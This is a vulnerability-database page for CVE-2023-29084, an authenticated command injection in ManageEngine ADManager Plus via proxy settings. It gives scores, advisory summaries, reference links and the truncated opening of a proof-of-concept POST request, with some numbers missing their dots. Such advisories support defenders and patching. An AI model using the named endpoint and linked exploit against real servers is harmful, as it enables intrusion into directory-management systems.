Published: 13/04/2023 Updated: 26/06/2023

CVSS v3 Base Score: 7.2 | Impact Score: 5.9 | Exploitability Score: 1.2

VMScore: 0

Subscribe to Manageengine Admanager Plus

Zoho ManageEngine ADManager Plus prior to 7181 allows for authenticated users to exploit command injection via Proxy settings.

Vulnerable Product	Search on Vulmon	Subscribe to Product
zohocorp manageengine admanager plus 7.1
zohocorp manageengine admanager plus

Check Point Reference: CPAI-2023-0226 Date Published: 2 May 2023 Severity: High ...

ManageEngine ADManager Plus versions prior to build 7181 are vulnerable to an authenticated command injection vulnerability due to insufficient validation of user input when performing the ChangePasswordAction function before passing it into a string that is later used as an OS command to execute ...

Command injection in ManageEngine ADManager Plus

CVE-2023-29084 Command injection in ManageEngine ADManager Plus Poc POST /api/json/admin/saveServerSettings HTTP/11 Host: 10101099:8080 Content-Length: 183 Accept: application/json, text/javascript, */*; q=001 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/50 (Windows NT 100; Win64; x64) AppleWebKit/53736 (KHTML, like Gecko) Chrome/10805359125 Safari/53736 Con

CWE-77 https://manageengine.com https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html http://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html https://nvd.nist.gov https://github.com/ohnonoyesyes/CVE-2023-29084 https://packetstormsecurity.com/files/172755/ManageEngine-ADManager-Plus-Command-Injection.html https://www.zerodayinitiative.com/advisories/ZDI-23-438/

CVE-2023-29084

Vulnerability Summary

Vulnerability Trend

Vendor Advisories

Exploits

Github Repositories

References

Vulmon Search

About

Products

Connect